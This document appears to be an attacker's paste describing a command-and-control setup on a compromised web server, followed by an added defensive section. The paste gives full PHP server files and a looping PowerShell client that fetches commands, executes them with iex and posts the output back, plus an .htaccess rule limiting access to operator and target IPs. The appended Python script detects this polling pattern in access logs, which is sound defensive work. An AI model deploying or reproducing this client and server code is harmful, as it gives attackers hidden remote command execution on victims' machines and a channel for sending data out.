- Vegeta_Ssj : Command to Control Server On Compromised Web Application
- email: vegeta_ssj@riseup.net
- jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
- https://saiyajinz.sytes.net
- https://i.postimg.cc/XYgzjC5c/1.png
- Attacker/Compromised WebApp:
- [windrcmm@server163 c2]$ ls
- command.txt index.php json.php json.txt output.txt post.php
- index.php | Simple page that sends a POST request with the command and displays the output from the infected host.
- <!DOCTYPE html>
- <head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><title>c&c</title>
- <meta http-equiv="refresh" content="10" />
- </head>
- <body>
- <center>
- <form name="yolo" id="banjolo"action="http://localhost/c2/post.php" method="post">
- <p>
- <b>Enter Command:</b><br>
- <input type="text" name="lolo" id="banjolo" class="input" value="" size="112" autocapitalize="off" />
- </p></p></form>
- <div><object width="700" height="700" data="/c2/json.txt"></object></div>
- </center>
- </body
- </html>
- post.php | The PHP script that receives the POST request with the command and saves it to the text file:
- <?php
- header ('Location: http://localhost/c2');
- $handle = fopen("/home/windrcmm/www/c2/command.txt", "w");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fclose($handle);
- exit;
- ?>
- json.php | A PHP script that receives data in JSON format sent from an infected station and saves it to a text file.
- <?php
- $jsonString = file_get_contents("php://input");
- $myFile = "json.txt";
- file_put_contents($myFile,$jsonString);
- ?>
- Target / PowerShell Client:
- #CremeDeLaCreme c&c client
- while($true)
- {
- $res=Invoke-WebRequest “http://localhost/c2/command.txt”
- $www = $res.ParsedHtml.body.innerText;$request = $www -replace ‘command=’
- $execute = $request | iex | Out-String
- $param = @{
- Uri = "https://localhost/c2/json.php"
- Method = "Post"
- Body = $execute
- ContentType = "application/json"
- }
- Invoke-RestMethod @param
- }
- .htaccess | I secure the path to my c2 by allowing only my and my target's IP addresses. You can add a second layer with basic authentication.
- RewriteEngine on
- RewriteCond %{REMOTE_ADDR} !185.10.68.218$
- RewriteCond %{REMOTE_ADDR} !98.98.98.98$
- RewriteRule ^/?c2 - [F]
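
A defender's view of the traffic this setup produces, as an added example that is not part of the original paste: the client above fetches `command.txt` and then POSTs to `json.php` in the same directory in a loop, so the web server's access log shows that pair repeating from one address. The Apache combined log format, the sample entries, the addresses, the user-agent build number and the `min_cycles` threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import dirname

# Apache "combined" access-log line: ip, time, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def find_polling_clients(lines, min_cycles=3):
    """Count 'GET <dir>/*.txt' then 'POST <dir>/*.php' pairs per (ip, dir)."""
    pending = {}                    # ip -> directory of that client's last GET *.txt
    cycles = defaultdict(int)       # (ip, directory) -> completed pairs
    ps_ua = defaultdict(bool)       # (ip, directory) -> PowerShell user agent seen
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                # not a combined-format line
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]
        directory = dirname(path)
        if method == "GET" and path.endswith(".txt"):
            pending[ip] = directory
        elif method == "POST" and path.endswith(".php"):
            if pending.pop(ip, None) == directory:
                cycles[(ip, directory)] += 1
                ps_ua[(ip, directory)] |= "PowerShell" in m["ua"]
        else:
            pending.pop(ip, None)   # any other request breaks the pair
    return {k: (n, ps_ua[k]) for k, n in cycles.items() if n >= min_cycles}

# Constructed sample data: documentation IP ranges, made-up times and UA build.
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"

def _entry(ip, sec, method, path, ua):
    ts = f"01/Jan/2024:10:00:{sec:02d} +0000"
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 10 "-" "{ua}"'
SAMPLE_LOG = []
for i in range(4):                  # four fetch/report cycles from one host
    SAMPLE_LOG.append(_entry("203.0.113.7", i, "GET", "/c2/command.txt", PS_UA))
    SAMPLE_LOG.append(_entry("198.51.100.20", i, "GET", "/index.php", BROWSER_UA))
    SAMPLE_LOG.append(_entry("203.0.113.7", i, "POST", "/c2/json.php", PS_UA))
SAMPLE_LOG.append(_entry("198.51.100.20", 9, "GET", "/robots.txt", BROWSER_UA))
SAMPLE_LOG.append(_entry("198.51.100.20", 9, "POST", "/contact.php", BROWSER_UA))

if __name__ == "__main__":
    print(find_polling_clients(SAMPLE_LOG))
```

State is kept per client address, so interleaved requests from other visitors do not hide the pair; the result maps each flagged `(ip, directory)` to the number of completed pairs and whether a PowerShell user agent was seen.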